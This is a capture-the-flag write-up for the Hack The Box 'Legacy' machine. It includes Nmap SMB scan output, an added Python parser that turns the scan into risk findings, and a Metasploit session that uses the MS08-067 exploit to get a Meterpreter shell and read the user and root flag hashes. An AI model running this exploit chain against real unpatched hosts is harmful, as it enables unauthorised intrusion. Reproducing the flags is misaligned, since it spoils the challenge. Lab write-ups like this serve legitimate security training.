Let’s get started

As always, hacking starts with an Nmap scan.

    Nmap scan report for 10.10.10.4
    PORT     STATE  SERVICE       VERSION
    139/tcp  open   netbios-ssn   Microsoft Windows netbios-ssn
    445/tcp  open   microsoft-ds  Windows XP microsoft-ds
    3389/tcp closed ms-wbt-server
    Running (JUST GUESSING): Microsoft Windows 2000|XP|2003|PocketPC/CE (91%)
    OS CPE: cpe:/o:microsoft:windows_2000 cpe:/o:microsoft:windows_xp
    Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

    Host script results:
    |_nbstat: NetBIOS name: LEGACY, NetBIOS user: unknown, NetBIOS MAC: 00:50:56:aa:ea:dc (VMware)
    | smb-os-discovery: 
    |   OS: Windows XP (Windows 2000 LAN Manager)
    |   OS CPE: cpe:/o:microsoft:windows_xp::-
    |   Computer name: legacy
    |   NetBIOS computer name: LEGACY\x00
    |   Workgroup: HTB\x00
    | smb-security-mode: 
    |   account_used: blank
    |   authentication_level: user
    |   challenge_response: supported
    |_  message_signing: disabled (dangerous, but default)
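The two SMB host scripts above already tell a defender most of what matters: the OS is out of support and message signing is off. As an added example that is not part of the original write-up, this small Python script parses those `smb-os-discovery` / `smb-security-mode` blocks (the sample text embedded in it is copied from the scan above) and turns them into risk findings you could feed into an asset inventory; the end-of-life list and finding wording are my own.

```python
import re

# Constructed sample: the smb-* host script blocks from the Nmap scan of 10.10.10.4 above.
NMAP_HOST_SCRIPTS = r"""
| smb-os-discovery: 
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\x00
|   Workgroup: HTB\x00
| smb-security-mode: 
|   account_used: blank
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
"""

# Operating systems Microsoft no longer patches (assumed list); SMB on them stays exposed to old bugs.
END_OF_LIFE = ("Windows 2000", "Windows XP", "Windows Server 2003")

# Matches the indented "key: value" lines of an Nmap script block, e.g. "|   OS: Windows XP ..."
FIELD_RE = re.compile(r"^\|_?\s+([^:]+?):\s*(.*)$")


def parse_smb_scripts(text):
    """Turn the 'key: value' lines of the smb-* script blocks into a dict (values stripped)."""
    fields = {}
    for line in text.splitlines():
        m = FIELD_RE.match(line)
        if m:
            fields[m.group(1).strip()] = m.group(2).strip()
    return fields


def smb_findings(fields):
    """Return a list of human-readable risk findings derived from the parsed fields."""
    findings = []
    os_name = fields.get("OS", "")
    if any(eol in os_name for eol in END_OF_LIFE):
        findings.append(f"unsupported OS exposed over SMB: {os_name}")
    if fields.get("message_signing", "").startswith("disabled"):
        findings.append("SMB message signing disabled: sessions can be relayed or tampered with")
    if fields.get("authentication_level") == "share":
        findings.append("share-level authentication: per-user access control is not enforced")
    return findings


if __name__ == "__main__":
    for finding in smb_findings(parse_smb_scripts(NMAP_HOST_SCRIPTS)):
        print("FINDING:", finding)
```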

As we can see, it is a Windows XP machine, which can be exploited in many ways. The easy way is to use Metasploit and take down the machine.

Metasploit

    msfconsole
    msf5 > search netapi
    Matching Modules
    ================

       #  Name                                 Disclosure Date  Rank    Check  Description
       -  ----                                 ---------------  ----    -----  -----------
       0  exploit/windows/smb/ms03_049_netapi  2003-11-11       good    No     MS03-049 Microsoft Workstation Service NetAddAlternateComputerName Overflow
       1  exploit/windows/smb/ms06_040_netapi  2006-08-08       good    No     MS06-040 Microsoft Server Service NetpwPathCanonicalize Overflow
       2  exploit/windows/smb/ms06_070_wkssvc  2006-11-14       manual  No     MS06-070 Microsoft Workstation Service NetpManageIPCConnect Overflow
       3  exploit/windows/smb/ms08_067_netapi  2008-10-28       great   Yes    MS08-067 Microsoft Server Service Relative Path Stack Corruption

    msf5 > use exploit/windows/smb/ms08_067_netapi
    msf5 exploit(windows/smb/ms08_067_netapi) > set rhost 10.10.10.4
    rhost => 10.10.10.4
    msf5 exploit(windows/smb/ms08_067_netapi) > set lhost tun0
    lhost => tun0
    msf5 exploit(windows/smb/ms08_067_netapi) > exploit

After the exploit completes successfully, we get a Meterpreter shell:

    meterpreter > sysinfo
    Computer        : LEGACY
    OS              : Windows XP (5.1 Build 2600, Service Pack 3).
    Architecture    : x86
    System Language : en_US
    Domain          : HTB
    Logged On Users : 1
    Meterpreter     : x86/windows

Getting User.txt

    meterpreter > ls
    Listing: C:\Documents and Settings\john\Desktop
    ===============================================
    Mode              Size  Type  Last modified              Name
    ----              ----  ----  -------------              ----
    100444/r--r--r--  32    fil   2017-03-16 02:19:32 -0400  user.txt
    meterpreter > cat user.txt
    e69af0e4f443de7e36876fda4ec7644f

Getting Root.txt

    meterpreter > ls
    Listing: C:\Documents and Settings\Administrator\Desktop
    ========================================================
    Mode              Size  Type  Last modified              Name
    ----              ----  ----  -------------              ----
    100444/r--r--r--  32    fil   2017-03-16 02:18:19 -0400  root.txt
    meterpreter > cat root.txt
    993442d258b0e0ec917cae9e695d5713

Getting both flags is just that easy.

If you like my work, please consider giving me +rep on HackTheBox.

My HackTheBox profile: https://www.hackthebox.eu/home/users/profile/291968